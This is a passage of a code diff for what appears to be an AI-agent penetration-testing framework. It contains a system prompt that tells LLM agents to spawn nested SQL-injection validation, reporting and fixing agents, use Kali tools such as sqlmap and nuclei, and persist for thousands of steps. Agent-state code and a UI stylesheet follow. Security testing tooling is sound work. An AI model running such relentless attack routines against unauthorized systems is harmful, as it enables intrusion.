 6. **ONE JOB PER AGENT** - Each agent has ONE specific task only
 WHEN TO CREATE NEW AGENTS:
 BLACK-BOX (domain/URL only):
 - Found new subdomain? → Create subdomain-specific agent
 - Found SQL injection hint? → Create SQL injection agent
 - SQL injection agent finds potential vulnerability in login form? → Create "SQLi Validation Agent (Login Form)"
 - Validation agent confirms vulnerability? → Create "SQLi Reporting Agent (Login Form)" (NO fixing agent)
 WHITE-BOX (source code provided):
 - Found authentication code issues? → Create authentication analysis agent
 - Auth agent finds potential vulnerability? → Create "Auth Validation Agent"
 - Validation agent confirms vulnerability? → Create "Auth Reporting Agent"
 - Reporting agent documents vulnerability? → Create "Auth Fixing Agent" (implement code fix and test it works)
 VULNERABILITY WORKFLOW (MANDATORY FOR EVERY FINDING):
 BLACK-BOX WORKFLOW (domain/URL only):
 ```
 SQL Injection Agent finds vulnerability in login form
    ↓
 Spawns "SQLi Validation Agent (Login Form)" (proves it's real with PoC)
    ↓
 If valid → Spawns "SQLi Reporting Agent (Login Form)" (creates vulnerability report)
    ↓
 STOP - No fixing agents in black-box testing
 ```
 WHITE-BOX WORKFLOW (source code provided):
 ```
 Authentication Code Agent finds weak password validation
    ↓
 Spawns "Auth Validation Agent" (proves it's exploitable)
    ↓
 If valid → Spawns "Auth Reporting Agent" (creates vulnerability report)
    ↓
 Spawns "Auth Fixing Agent" (implements secure code fix)
 ```
 CRITICAL RULES:
 - **NO FLAT STRUCTURES** - Always create nested agent trees
 - **VALIDATION IS MANDATORY** - Never trust scanner output, always validate with PoCs
 - **REALISTIC OUTCOMES** - Some tests find nothing, some validations fail
 - **ONE AGENT = ONE TASK** - Don't let agents do multiple unrelated jobs
 - **SPAWN REACTIVELY** - Create new agents based on what you discover
 - **ONLY REPORTING AGENTS** can use create_vulnerability_report tool
 REALISTIC TESTING OUTCOMES:
 - **No Findings**: Agent completes testing but finds no vulnerabilities
 - **Validation Failed**: Initial finding was false positive, validation agent confirms it's not exploitable
 - **Valid Vulnerability**: Validation succeeds, spawns reporting agent and then fixing agent (white-box)
 PERSISTENCE IS MANDATORY:
 - Real vulnerabilities take TIME - expect to need 2000+ steps minimum
 - NEVER give up early - attackers spend weeks on single targets
 - If one approach fails, try 10 more approaches
 - Each failure teaches you something - use it to refine next attempts
 - Bug bounty hunters spend DAYS on single targets - so should you
 - There are ALWAYS more attack vectors to explore
 </multi_agent_system>
 <tool_usage>
 Tool calls use XML format:
 <function=tool_name>
 <parameter=param_name>value</parameter>
 </function>
 CRITICAL RULES:
 1. One tool call per message
 2. Tool call must be last in message
 3. End response after </function> tag
 5. Thinking is NOT optional - it's required for reasoning and success
 SPRAYING EXECUTION NOTE:
 - When performing large payload sprays or fuzzing, encapsulate the entire spraying loop inside a single python or terminal tool call (e.g., a Python script using asyncio/aiohttp). Do not issue one tool call per payload.
 - Favor batch-mode CLI tools (sqlmap, ffuf, nuclei, zaproxy, arjun) where appropriate and check traffic via the proxy when beneficial
 {{ get_tools_prompt() }}
 </tool_usage>
 <environment>
 Docker container with Kali Linux and comprehensive security tools:
 RECONNAISSANCE & SCANNING:
 - nmap, ncat, ndiff - Network mapping and port scanning
 - subfinder - Subdomain enumeration
 - naabu - Fast port scanner
 - httpx - HTTP probing and validation
 - gospider - Web spider/crawler
 VULNERABILITY ASSESSMENT:
 - nuclei - Vulnerability scanner with templates
 - sqlmap - SQL injection detection/exploitation
 - trivy - Container/dependency vulnerability scanner
 - zaproxy - OWASP ZAP web app scanner
 - wapiti - Web vulnerability scanner
 WEB FUZZING & DISCOVERY:
 - ffuf - Fast web fuzzer
 - dirsearch - Directory/file discovery
 - katana - Advanced web crawler
 - arjun - HTTP parameter discovery
 - vulnx (cvemap) - CVE vulnerability mapping
 JAVASCRIPT ANALYSIS:
 - JS-Snooper, jsniper.sh - JS analysis scripts
 - retire - Vulnerable JS library detection
 - eslint, jshint - JS static analysis
 - js-beautify - JS beautifier/deobfuscator
 CODE ANALYSIS:
 - semgrep - Static analysis/SAST
 - bandit - Python security linter
 - trufflehog - Secret detection in code
 SPECIALIZED TOOLS:
 - jwt_tool - JWT token manipulation
 - wafw00f - WAF detection
 - interactsh-client - OOB interaction testing
 PROXY & INTERCEPTION:
 - Caido CLI - Modern web proxy (already running). Used with proxy tool or with python tool (functions already imported).
 - NOTE: If you are seeing proxy errors when sending requests, it usually means you are not sending requests to a correct url/host/port.
 PROGRAMMING:
 - Python 3, Poetry, Go, Node.js/npm
 - Full development environment
 - Docker is NOT available inside the sandbox. Do not run docker; rely on provided tools to run locally.
 - You can install any additional tools/packages needed based on the task/context using package managers (apt, pip, npm, go install, etc.)
 Directories:
 - /workspace - Your private agent directory
 - /shared_workspace - Shared between agents
 - /home/pentester/tools - Additional tool scripts
 - /home/pentester/tools/wordlists - Currently empty, but you should download wordlists here when you need.
 Default user: pentester (sudo available)
 </environment>
 {% if loaded_module_names %}
 <specialized_knowledge>
 {# Dynamic prompt modules loaded based on agent specialization #}
 {% for module_name in loaded_module_names %}
 {{ get_module(module_name) }}
 {% endfor %}
 </specialized_knowledge>
 {% endif %}
--- a/strix/agents/init.py
+++ b/strix/agents/init.py
@@ -0,0 +1,10 @@
 from .base_agent import BaseAgent
 from .state import AgentState
 from .StrixAgent import StrixAgent
 __all__ = [
    "AgentState",
    "BaseAgent",
    "StrixAgent",
 ]
--- a/strix/agents/base_agent.py
+++ b/strix/agents/base_agent.py
@@ -0,0 +1,394 @@
 import asyncio
 import logging
 from pathlib import Path
 from typing import TYPE_CHECKING, Any, Optional
 if TYPE_CHECKING:
    from strix.cli.tracer import Tracer
 from jinja2 import (
    Environment,
    FileSystemLoader,
    select_autoescape,
 )
 from strix.llm import LLM, LLMConfig
 from strix.llm.utils import clean_content
 from strix.tools import process_tool_invocations
 from .state import AgentState
 logger = logging.getLogger(__name__)
 class AgentMeta(type):
    agent_name: str
    jinja_env: Environment
    def __new__(cls, name: str, bases: tuple[type, ...], attrs: dict[str, Any]) -> type:
        new_cls = super().__new__(cls, name, bases, attrs)
        if name == "BaseAgent":
            return new_cls
        agents_dir = Path(__file__).parent
        prompt_dir = agents_dir / name
        new_cls.agent_name = name
        new_cls.jinja_env = Environment(
            loader=FileSystemLoader(prompt_dir),
            autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),
        )
        return new_cls
 class BaseAgent(metaclass=AgentMeta):
    max_iterations = 200
    agent_name: str = ""
    jinja_env: Environment
    default_llm_config: LLMConfig | None = None
    def __init__(self, config: dict[str, Any]):
        self.config = config
        self.local_source_path = config.get("local_source_path")
        if "max_iterations" in config:
            self.max_iterations = config["max_iterations"]
        self.llm_config_name = config.get("llm_config_name", "default")
        self.llm_config = config.get("llm_config", self.default_llm_config)
        if self.llm_config is None:
            raise ValueError("llm_config is required but not provided")
        self.llm = LLM(self.llm_config, agent_name=self.agent_name)
        state_from_config = config.get("state")
        if state_from_config is not None:
            self.state = state_from_config
        else:
            self.state = AgentState(
                agent_name=self.agent_name,
                max_iterations=self.max_iterations,
            )
        self._current_task: asyncio.Task[Any] | None = None
        from strix.cli.tracer import get_global_tracer
        tracer = get_global_tracer()
        if tracer:
            tracer.log_agent_creation(
                agent_id=self.state.agent_id,
                name=self.state.agent_name,
                task=self.state.task,
                parent_id=self.state.parent_id,
            )
            if self.state.parent_id is None:
                scan_config = tracer.scan_config or {}
                exec_id = tracer.log_tool_execution_start(
                    agent_id=self.state.agent_id,
                    tool_name="scan_start_info",
                    args=scan_config,
                )
                tracer.update_tool_execution(execution_id=exec_id, status="completed", result={})
            else:
                exec_id = tracer.log_tool_execution_start(
                    agent_id=self.state.agent_id,
                    tool_name="subagent_start_info",
                    args={
                        "name": self.state.agent_name,
                        "task": self.state.task,
                        "parent_id": self.state.parent_id,
                    },
                )
                tracer.update_tool_execution(execution_id=exec_id, status="completed", result={})
        self._add_to_agents_graph()
    def _add_to_agents_graph(self) -> None:
        from strix.tools.agents_graph import agents_graph_actions
        node = {
            "id": self.state.agent_id,
            "name": self.state.agent_name,
            "task": self.state.task,
            "status": "running",
            "parent_id": self.state.parent_id,
            "created_at": self.state.start_time,
            "finished_at": None,
            "result": None,
            "llm_config": self.llm_config_name,
            "agent_type": self.__class__.__name__,
            "state": self.state.model_dump(),
        }
        agents_graph_actions._agent_graph["nodes"][self.state.agent_id] = node
        agents_graph_actions._agent_instances[self.state.agent_id] = self
        agents_graph_actions._agent_states[self.state.agent_id] = self.state
        if self.state.parent_id:
            agents_graph_actions._agent_graph["edges"].append(
                {"from": self.state.parent_id, "to": self.state.agent_id, "type": "delegation"}
            )
        if self.state.agent_id not in agents_graph_actions._agent_messages:
            agents_graph_actions._agent_messages[self.state.agent_id] = []
        if self.state.parent_id is None and agents_graph_actions._root_agent_id is None:
            agents_graph_actions._root_agent_id = self.state.agent_id
    def cancel_current_execution(self) -> None:
        if self._current_task and not self._current_task.done():
            self._current_task.cancel()
            self._current_task = None
    async def agent_loop(self, task: str) -> dict[str, Any]:
        await self._initialize_sandbox_and_state(task)
        from strix.cli.tracer import get_global_tracer
        tracer = get_global_tracer()
        while True:
            self._check_agent_messages(self.state)
            if self.state.is_waiting_for_input():
                await self._wait_for_input()
                continue
            if self.state.should_stop():
                await self._enter_waiting_state(tracer)
                continue
            self.state.increment_iteration()
            try:
                should_finish = await self._process_iteration(tracer)
                if should_finish:
                    await self._enter_waiting_state(tracer, task_completed=True)
                    continue
            except asyncio.CancelledError:
                await self._enter_waiting_state(tracer, error_occurred=False, was_cancelled=True)
                continue
            except (RuntimeError, ValueError, TypeError) as e:
                if not await self._handle_iteration_error(e, tracer):
                    await self._enter_waiting_state(tracer, error_occurred=True)
                    continue
    async def _wait_for_input(self) -> None:
        import asyncio
        await asyncio.sleep(0.5)
    async def _enter_waiting_state(
        self,
        tracer: Optional["Tracer"],
        task_completed: bool = False,
        error_occurred: bool = False,
        was_cancelled: bool = False,
    ) -> None:
        self.state.enter_waiting_state()
        if tracer:
            if task_completed:
                tracer.update_agent_status(self.state.agent_id, "completed")
            elif error_occurred:
                tracer.update_agent_status(self.state.agent_id, "error")
            elif was_cancelled:
                tracer.update_agent_status(self.state.agent_id, "stopped")
            else:
                tracer.update_agent_status(self.state.agent_id, "stopped")
        if task_completed:
            self.state.add_message(
                "assistant",
                "Task completed. I'm now waiting for follow-up instructions or new tasks.",
            )
        elif error_occurred:
            self.state.add_message(
                "assistant", "An error occurred. I'm now waiting for new instructions."
            )
        elif was_cancelled:
            self.state.add_message(
                "assistant", "Execution was cancelled. I'm now waiting for new instructions."
            )
        else:
            self.state.add_message(
                "assistant",
                "Execution paused. I'm now waiting for new instructions or any updates.",
            )
    async def _initialize_sandbox_and_state(self, task: str) -> None:
        import os
        sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
        if not sandbox_mode and self.state.sandbox_id is None:
            from strix.runtime import get_runtime
            runtime = get_runtime()
            sandbox_info = await runtime.create_sandbox(
                self.state.agent_id, self.state.sandbox_token, self.local_source_path
            )
            self.state.sandbox_id = sandbox_info["workspace_id"]
            self.state.sandbox_token = sandbox_info["auth_token"]
            self.state.sandbox_info = sandbox_info
        if not self.state.task:
            self.state.task = task
        self.state.add_message("user", task)
    async def _process_iteration(self, tracer: Optional["Tracer"]) -> bool:
        response = await self.llm.generate(self.state.get_conversation_history())
        content_stripped = (response.content or "").strip()
        if not content_stripped:
            corrective_message = (
                "You MUST NOT respond with empty messages. "
                "If you currently have nothing to do or say, use an appropriate tool instead:\n"
                "- Use agents_graph_actions.wait_for_message to wait for messages "
                "from user or other agents\n"
                "- Use agents_graph_actions.agent_finish if you are a sub-agent "
                "and your task is complete\n"
                "- Use finish_actions.finish_scan if you are the root/main agent "
                "and the scan is complete"
            )
            self.state.add_message("user", corrective_message)
            return False
        self.state.add_message("assistant", response.content)
        if tracer:
            tracer.log_chat_message(
                content=clean_content(response.content),
                role="assistant",
                agent_id=self.state.agent_id,
            )
        actions = (
            response.tool_invocations
            if hasattr(response, "tool_invocations") and response.tool_invocations
            else []
        )
        if actions:
            return await self._execute_actions(actions, tracer)
        return False
    async def _execute_actions(self, actions: list[Any], tracer: Optional["Tracer"]) -> bool:
        """Execute actions and return True if agent should finish."""
        for action in actions:
            self.state.add_action(action)
        conversation_history = self.state.get_conversation_history()
        tool_task = asyncio.create_task(
            process_tool_invocations(actions, conversation_history, self.state)
        )
        self._current_task = tool_task
        try:
            should_agent_finish = await tool_task
            self._current_task = None
        except asyncio.CancelledError:
            self._current_task = None
            self.state.add_error("Tool execution cancelled by user")
            raise
        self.state.messages = conversation_history
        if should_agent_finish:
            self.state.set_completed({"success": True})
            if tracer:
                tracer.update_agent_status(self.state.agent_id, "completed")
            return True
        return False
    async def _handle_iteration_error(
        self,
        error: RuntimeError | ValueError | TypeError | asyncio.CancelledError,
        tracer: Optional["Tracer"],
    ) -> bool:
        error_msg = f"Error in iteration {self.state.iteration}: {error!s}"
        logger.exception(error_msg)
        self.state.add_error(error_msg)
        if tracer:
            tracer.update_agent_status(self.state.agent_id, "error")
        return True
    def _check_agent_messages(self, state: AgentState) -> None:
        try:
            from strix.tools.agents_graph.agents_graph_actions import _agent_graph, _agent_messages
            agent_id = state.agent_id
            if not agent_id or agent_id not in _agent_messages:
                return
            messages = _agent_messages[agent_id]
            if messages:
                has_new_messages = False
                for message in messages:
                    if not message.get("read", False):
                        if state.is_waiting_for_input():
                            state.resume_from_waiting()
                            has_new_messages = True
                        sender_name = "Unknown Agent"
                        sender_id = message.get("from")
                        if sender_id == "user":
                            sender_name = "User"
                            state.add_message("user", message.get("content", ""))
                        else:
                            if sender_id and sender_id in _agent_graph.get("nodes", {}):
                                sender_name = _agent_graph["nodes"][sender_id]["name"]
                            message_content = f"""<inter_agent_message>
    <delivery_notice>
        <important>You have received a message from another agent. You should acknowledge
        this message and respond appropriately based on its content. However, DO NOT echo
        back or repeat the entire message structure in your response. Simply process the
        content and respond naturally as/if needed.</important>
    </delivery_notice>
    <sender>
        <agent_name>{sender_name}</agent_name>
        <agent_id>{sender_id}</agent_id>
    </sender>
    <message_metadata>
        <type>{message.get("message_type", "information")}</type>
        <priority>{message.get("priority", "normal")}</priority>
        <timestamp>{message.get("timestamp", "")}</timestamp>
    </message_metadata>
    <content>
 {message.get("content", "")}
    </content>
    <delivery_info>
        <note>This message was delivered during your task execution.
        Please acknowledge and respond if needed.</note>
    </delivery_info>
 </inter_agent_message>"""
                            state.add_message("user", message_content.strip())
                        message["read"] = True
                if has_new_messages and not state.is_waiting_for_input():
                    from strix.cli.tracer import get_global_tracer
                    tracer = get_global_tracer()
                    if tracer:
                        tracer.update_agent_status(agent_id, "running")
        except (AttributeError, KeyError, TypeError) as e:
            import logging
            logger = logging.getLogger(__name__)
            logger.warning(f"Error checking agent messages: {e}")
            return
--- a/strix/agents/state.py
+++ b/strix/agents/state.py
@@ -0,0 +1,139 @@
 import uuid
 from datetime import UTC, datetime
 from typing import Any
 from pydantic import BaseModel, Field
 def _generate_agent_id() -> str:
    return f"agent_{uuid.uuid4().hex[:8]}"
 class AgentState(BaseModel):
    agent_id: str = Field(default_factory=_generate_agent_id)
    agent_name: str = "Strix Agent"
    parent_id: str | None = None
    sandbox_id: str | None = None
    sandbox_token: str | None = None
    sandbox_info: dict[str, Any] | None = None
    task: str = ""
    iteration: int = 0
    max_iterations: int = 200
    completed: bool = False
    stop_requested: bool = False
    waiting_for_input: bool = False
    final_result: dict[str, Any] | None = None
    messages: list[dict[str, Any]] = Field(default_factory=list)
    context: dict[str, Any] = Field(default_factory=dict)
    start_time: str = Field(default_factory=lambda: datetime.now(UTC).isoformat())
    last_updated: str = Field(default_factory=lambda: datetime.now(UTC).isoformat())
    actions_taken: list[dict[str, Any]] = Field(default_factory=list)
    observations: list[dict[str, Any]] = Field(default_factory=list)
    errors: list[str] = Field(default_factory=list)
    def increment_iteration(self) -> None:
        self.iteration += 1
        self.last_updated = datetime.now(UTC).isoformat()
    def add_message(self, role: str, content: Any) -> None:
        self.messages.append({"role": role, "content": content})
        self.last_updated = datetime.now(UTC).isoformat()
    def add_action(self, action: dict[str, Any]) -> None:
        self.actions_taken.append(
            {
                "iteration": self.iteration,
                "timestamp": datetime.now(UTC).isoformat(),
                "action": action,
            }
        )
    def add_observation(self, observation: dict[str, Any]) -> None:
        self.observations.append(
            {
                "iteration": self.iteration,
                "timestamp": datetime.now(UTC).isoformat(),
                "observation": observation,
            }
        )
    def add_error(self, error: str) -> None:
        self.errors.append(f"Iteration {self.iteration}: {error}")
        self.last_updated = datetime.now(UTC).isoformat()
    def update_context(self, key: str, value: Any) -> None:
        self.context[key] = value
        self.last_updated = datetime.now(UTC).isoformat()
    def set_completed(self, final_result: dict[str, Any] | None = None) -> None:
        self.completed = True
        self.final_result = final_result
        self.last_updated = datetime.now(UTC).isoformat()
    def request_stop(self) -> None:
        self.stop_requested = True
        self.last_updated = datetime.now(UTC).isoformat()
    def should_stop(self) -> bool:
        return self.stop_requested or self.completed or self.has_reached_max_iterations()
    def is_waiting_for_input(self) -> bool:
        return self.waiting_for_input
    def enter_waiting_state(self) -> None:
        self.waiting_for_input = True
        self.stop_requested = False
        self.last_updated = datetime.now(UTC).isoformat()
    def resume_from_waiting(self, new_task: str | None = None) -> None:
        self.waiting_for_input = False
        self.stop_requested = False
        self.completed = False
        if new_task:
            self.task = new_task
        self.last_updated = datetime.now(UTC).isoformat()
    def has_reached_max_iterations(self) -> bool:
        return self.iteration >= self.max_iterations
    def has_empty_last_messages(self, count: int = 3) -> bool:
        if len(self.messages) < count:
            return False
        last_messages = self.messages[-count:]
        for message in last_messages:
            content = message.get("content", "")
            if isinstance(content, str) and content.strip():
                return False
        return True
    def get_conversation_history(self) -> list[dict[str, Any]]:
        return self.messages
    def get_execution_summary(self) -> dict[str, Any]:
        return {
            "agent_id": self.agent_id,
            "agent_name": self.agent_name,
            "parent_id": self.parent_id,
            "sandbox_id": self.sandbox_id,
            "sandbox_info": self.sandbox_info,
            "task": self.task,
            "iteration": self.iteration,
            "max_iterations": self.max_iterations,
            "completed": self.completed,
            "final_result": self.final_result,
            "start_time": self.start_time,
            "last_updated": self.last_updated,
            "total_actions": len(self.actions_taken),
            "total_observations": len(self.observations),
            "total_errors": len(self.errors),
            "has_errors": len(self.errors) > 0,
            "max_iterations_reached": self.has_reached_max_iterations() and not self.completed,
        }
--- a/strix/cli/init.py
+++ b/strix/cli/init.py
@@ -0,0 +1,4 @@
 from .main import main
 __all__ = ["main"]
--- a/strix/cli/app.py
+++ b/strix/cli/app.py
--- a/strix/cli/assets/cli.tcss
+++ b/strix/cli/assets/cli.tcss
@@ -0,0 +1,680 @@
 Screen {
    background: #1a1a1a;
    color: #d4d4d4;
 }
 #splash_screen {
    height: 100%;
    width: 100%;
    background: #1a1a1a;
    color: #22c55e;
    content-align: center middle;
    text-align: center;
 }
 #splash_content {
    width: auto;
    height: auto;
    background: transparent;
    text-align: center;
    padding: 2;
 }
 #main_container {
    height: 100%;
    padding: 0;
    margin: 0;
    background: #1a1a1a;
 }
 #content_container {
    height: 1fr;
    padding: 0;
    background: transparent;
 }
 #agents_tree {
    width: 20%;
    background: transparent;
    border: round #262626;
    border-title-color: #a8a29e;
    border-title-style: bold;
    margin-left: 1;
    padding: 1;
 }
 #chat_area_container {
    width: 80%;
    background: transparent;
 }
 #chat_history {
    height: 1fr;
    background: transparent;
    border: round #1a1a1a;
    padding: 0;
    margin-bottom: 0;
    margin-right: 0;
    scrollbar-background: #0f0f0f;
    scrollbar-color: #262626;
    scrollbar-corner-color: #0f0f0f;
    scrollbar-size: 1 1;
 }
 #agent_status_display {
    height: 1;
    background: transparent;
    margin: 0;
    padding: 0 1;
 }
 #agent_status_display.hidden {
    display: none;
 }
 #status_text {
    width: 1fr;
    height: 100%;
    background: transparent;
    color: #a3a3a3;
    text-align: left;
    content-align: left middle;
    text-style: italic;
    margin: 0;
    padding: 0;
 }
 #keymap_indicator {
    width: auto;
    height: 100%;
    background: transparent;
    color: #737373;
    text-align: right;
    content-align: right middle;
    text-style: none;
    margin: 0;
    padding: 0;
 }
 #chat_input_container {
    height: 3;
    background: transparent;
    border: round #525252;
    margin-right: 0;
    padding: 0;
    layout: horizontal;
    align-vertical: middle;
 }
 #chat_input_container:focus-within {
    border: round #22c55e;
 }
 #chat_input_container:focus-within #chat_prompt {
    color: #22c55e;
    text-style: bold;
 }
 #chat_prompt {
    width: auto;
    height: 100%;
    padding: 0 0 0 1;
    color: #737373;
    content-align-vertical: middle;
 }
 #chat_history:focus {
    border: round #22c55e;
 }
 #chat_input {
    width: 1fr;
    height: 100%;
    background: #121212;
    border: none;
    color: #d4d4d4;
    padding: 0;
    margin: 0;
 }
 #chat_input:focus {
    border: none;
 }
 #chat_input > .text-area--placeholder {
    color: #525252;
    text-style: italic;
 }
 #chat_input > .text-area--cursor {
    color: #22c55e;
    background: #22c55e;
 }
 .chat-placeholder {
    width: 100%;
    height: 100%;
    content-align: center middle;
    text-align: center;
    color: #737373;
    text-style: italic;
 }
 .chat-content {
    margin: 0 !important;
    margin-top: 0 !important;
    margin-bottom: 0 !important;
    padding: 0 1;
    background: transparent;
    width: 100%;
 }
 .chat-message {
    margin-bottom: 0;
    padding: 0;
    background: transparent;
    width: 100%;
 }
 .user-message {
    color: #e5e5e5;
    border-left: thick #3b82f6;
    padding-left: 1;
    margin-bottom: 1;
 }
 .tool-call {
    margin: 0 !important;
    margin-top: 0 !important;
    margin-bottom: 0 !important;
    padding: 0 1;
    background: #0a0a0a;
    border: round #1a1a1a;
    border-left: thick #f59e0b;
    width: 100%;
 }
 .tool-call.status-completed {
    border-left: thick #22c55e;
    background: #0d1f12;
    margin: 0 !important;
    margin-top: 0 !important;
    margin-bottom: 0 !important;
 }
 .tool-call.status-running {
    border-left: thick #f59e0b;
    background: #1f1611;
    margin: 0 !important;
    margin-top: 0 !important;
    margin-bottom: 0 !important;
 }
 .tool-call.status-failed,
 .tool-call.status-error {
    border-left: thick #ef4444;
    background: #1f0d0d;
    margin: 0 !important;
    margin-top: 0 !important;
    margin-bottom: 0 !important;
 }
 .browser-tool,
 .terminal-tool,
 .python-tool,
 .agents-graph-tool,
 .file-edit-tool,
 .proxy-tool,
 .notes-tool,
 .thinking-tool,
 .web-search-tool,
 .finish-tool,
 .reporting-tool,
 .scan-info-tool,
 .subagent-info-tool {
    margin: 0 !important;
    margin-top: 0 !important;
    margin-bottom: 0 !important;
 }
 .browser-tool {
    border-left: thick #06b6d4;
 }
 .browser-tool.status-completed {
    border-left: thick #06b6d4;
    background: transparent;
    margin: 0 !important;
    margin-top: 0 !important;
    margin-bottom: 0 !important;
 }
 .browser-tool.status-running {
    border-left: thick #0891b2;
    background: transparent;
    margin: 0 !important;
    margin-top: 0 !important;
    margin-bottom: 0 !important;
 }
 .terminal-tool {
    border-left: thick #22c55e;
 }
 .terminal-tool.status-completed {
    border-left: thick #22c55e;
    background: transparent;
 }
 .terminal-tool.status-running {
    border-left: thick #16a34a;
    background: transparent;
 }
 .python-tool {
    border-left: thick #3b82f6;
 }
 .python-tool.status-completed {
    border-left: thick #3b82f6;
    background: transparent;
 }
 .python-tool.status-running {
    border-left: thick #2563eb;
    background: transparent;
 }
 .agents-graph-tool {
    border-left: thick #fbbf24;
 }
 .agents-graph-tool.status-completed {
    border-left: thick #fbbf24;
    background: transparent;
 }
 .agents-graph-tool.status-running {
    border-left: thick #f59e0b;
    background: transparent;
 }
 .file-edit-tool {
    border-left: thick #10b981;
 }
 .file-edit-tool.status-completed {
    border-left: thick #10b981;
    background: transparent;
 }
 .file-edit-tool.status-running {
    border-left: thick #059669;
    background: transparent;
 }
 .proxy-tool {
    border-left: thick #06b6d4;
 }
 .proxy-tool.status-completed {
    border-left: thick #06b6d4;
    background: transparent;
 }
 .proxy-tool.status-running {
    border-left: thick #0891b2;
    background: transparent;
 }
 .notes-tool {
    border-left: thick #fbbf24;
 }
 .notes-tool.status-completed {
    border-left: thick #fbbf24;
    background: transparent;
 }
 .notes-tool.status-running {
    border-left: thick #f59e0b;
    background: transparent;
 }
 .thinking-tool {
    border-left: thick #a855f7;
 }
 .thinking-tool.status-completed {
    border-left: thick #a855f7;
    background: transparent;
 }
 .thinking-tool.status-running {
    border-left: thick #9333ea;
    background: transparent;
 }
 .web-search-tool {
    border-left: thick #22c55e;
 }
 .web-search-tool.status-completed {
    border-left: thick #22c55e;
    background: transparent;
 }
 .web-search-tool.status-running {
    border-left: thick #16a34a;
    background: transparent;
 }
 .finish-tool {
    border-left: thick #dc2626;
 }
 .finish-tool.status-completed {
    border-left: thick #dc2626;
    background: transparent;
 }
 .finish-tool.status-running {
    border-left: thick #b91c1c;
    background: transparent;
 }
 .reporting-tool {
    border-left: thick #ea580c;
 }
 .reporting-tool.status-completed {
    border-left: thick #ea580c;
    background: transparent;
 }
 .reporting-tool.status-running {
    border-left: thick #c2410c;
    background: transparent;
 }
 .scan-info-tool {
    border-left: thick #22c55e;
    background: transparent;
    margin: 0 !important;
    margin-top: 0 !important;
    margin-bottom: 0 !important;
 }
 .scan-info-tool.status-completed {
    border-left: thick #22c55e;
    background: transparent;
 }
 .scan-info-tool.status-running {
    border-left: thick #16a34a;
    background: transparent;
 }
 .subagent-info-tool {
    border-left: thick #22c55e;
    background: transparent;
    margin: 0 !important;
    margin-top: 0 !important;
    margin-bottom: 0 !important;
 }
 .subagent-info-tool.status-completed {
    border-left: thick #22c55e;
    background: transparent;
 }
 .subagent-info-tool.status-running {
    border-left: thick #16a34a;
    background: transparent;
 }
 Tree {
    background: transparent;
    color: #e7e5e4;
    scrollbar-background: transparent;
    scrollbar-color: #404040;
    scrollbar-corner-color: transparent;
    scrollbar-size: 1 1;
 }
 Tree > .tree--label {
    text-style: bold;
    color: #a8a29e;
    background: transparent;
    padding: 0 1;
    margin-bottom: 1;
    border-bottom: solid #262626;
    text-align: center;
 }
 .tree--node {
    height: 1;
    padding: 0;
    margin: 0;
 }
 .tree--node-label {
    color: #d6d3d1;
    background: transparent;
    text-style: none;
    padding: 0 1;
    margin: 0 1;
 }
 .tree--node:hover .tree--node-label {
    background: transparent;
    color: #fafaf9;
    text-style: bold;
    border-left: solid #a8a29e;
 }
 .tree--node.-selected .tree--node-label {
    background: transparent;
    color: #fafaf9;
    text-style: bold;
    border-left: heavy #d6d3d1;
 }
 .tree--node.-expanded .tree--node-label {
    text-style: bold;
    color: #fafaf9;
    background: transparent;
    border-left: solid #78716c;
 }
 Tree:focus {
    border: round #262626;
 }
 Tree:focus > .tree--label {
    color: #fafaf9;
    text-style: bold;
    background: transparent;
 }
 .tree--node .tree--node .tree--node-label {
    color: #a8a29e;
    padding-left: 2;
    border: none;
    background: transparent;
    margin-left: 1;
 }
 .tree--node .tree--node:hover .tree--node-label {
    background: transparent;
    color: #e7e5e4;
 }
 .tree--node .tree--node .tree--node .tree--node-label {
    color: #78716c;
    padding-left: 3;
    text-style: none;
    border: none;
    background: transparent;
    margin-left: 2;
 }
 StopAgentScreen {
    align: center middle;
    background: $background 0%;
 }
 #stop_agent_dialog {
    grid-size: 1;
    grid-gutter: 1;
    grid-rows: auto auto;
    padding: 1;
    width: 30;
    height: auto;
    border: round #a3a3a3;
    background: #1a1a1a 98%;
 }
 #stop_agent_title {
    color: #a3a3a3;
    text-style: bold;
    text-align: center;
    width: 100%;
    margin-bottom: 0;
 }
 #stop_agent_buttons {
    grid-size: 2;
    grid-gutter: 1;
    grid-columns: 1fr 1fr;
    width: 100%;
    height: 1;
 }
 #stop_agent_buttons Button {
    height: 1;
    min-height: 1;
    border: none;
    text-style: bold;
 }
 #stop_agent {
    background: transparent;
    color: #ef4444;
    border: none;
 }
 #stop_agent:hover, #stop_agent:focus {
    background: #ef4444;
    color: #ffffff;
    border: none;
 }
 #cancel_stop {
    background: transparent;
    color: #737373;
    border: none;
 }
 #cancel_stop:hover, #cancel_stop:focus {
    background:rgb(54, 54, 54);
    color: #ffffff;
    border: none;
 }
 QuitScreen {
    align: center middle;
    background: $background 0%;
 }
 #quit_dialog {
    grid-size: 1;
    grid-gutter: 1;
    grid-rows: auto auto;
    padding: 1;
    width: 24;
    height: auto;
    border: round #525252;
    background: #1a1a1a 98%;
 }
 #quit_title {
    color: #d4d4d4;
    text-style: bold;
    text-align: center;
    width: 100%;
    margin-bottom: 0;
 }
 #quit_buttons {
    grid-size: 2;
    grid-gutter: 1;
    grid-columns: 1fr 1fr;
    width: 100%;
    height: 1;
 }
 #quit_buttons Button {
    height: 1;
    min-height: 1;
    border: none;
    text-style: bold;
 }
 #quit {
    background: transparent;
    color: #ef4444;
    border: none;
 }
 #quit:hover, #quit:focus {
    background: #ef4444;
    color: #ffffff;
    border: none;
 }
 #cancel {
    background: transparent;
    color: #737373;
    border: none;
 }
 #cancel:hover, #cancel:focus {
    background:rgb(54, 54, 54);
    color: #ffffff;
    border: none;
 }
 HelpScreen {
    align: center middle;
    background: $background 0%;
 }
 #dialog {
    grid-size: 1;
    grid-gutter: 0 1;
    grid-rows: auto auto;
    padding: 1 2;
    width: 40;
    height: auto;
    border: round #22c55e;
    background: #1a1a1a 98%;
 }
 #help_title {
    color: #22c55e;
    text-style: bold;
    text-align: center;
    width: 100%;
    margin-bottom: 1;
 }
 #help_content {
    color: #d4d4d4;
    text-align: left;
    width: 100%;
    margin-bottom: 1;
    padding: 0;
    background: transparent;
    text-style: none;
 }
--- a/strix/cli/main.py
+++ b/strix/cli/main.py
@@ -0,0 +1,542 @@
 #!/usr/bin/env python3
 """
 Strix Agent Command Line Interface
 """
 import argparse
 import asyncio
 import logging
 import os
 import secrets
 import sys
 from pathlib import Path
 from typing import Any
 from urllib.parse import urlparse
 import docker
 import litellm
 from docker.errors import DockerException
 from rich.console import Console
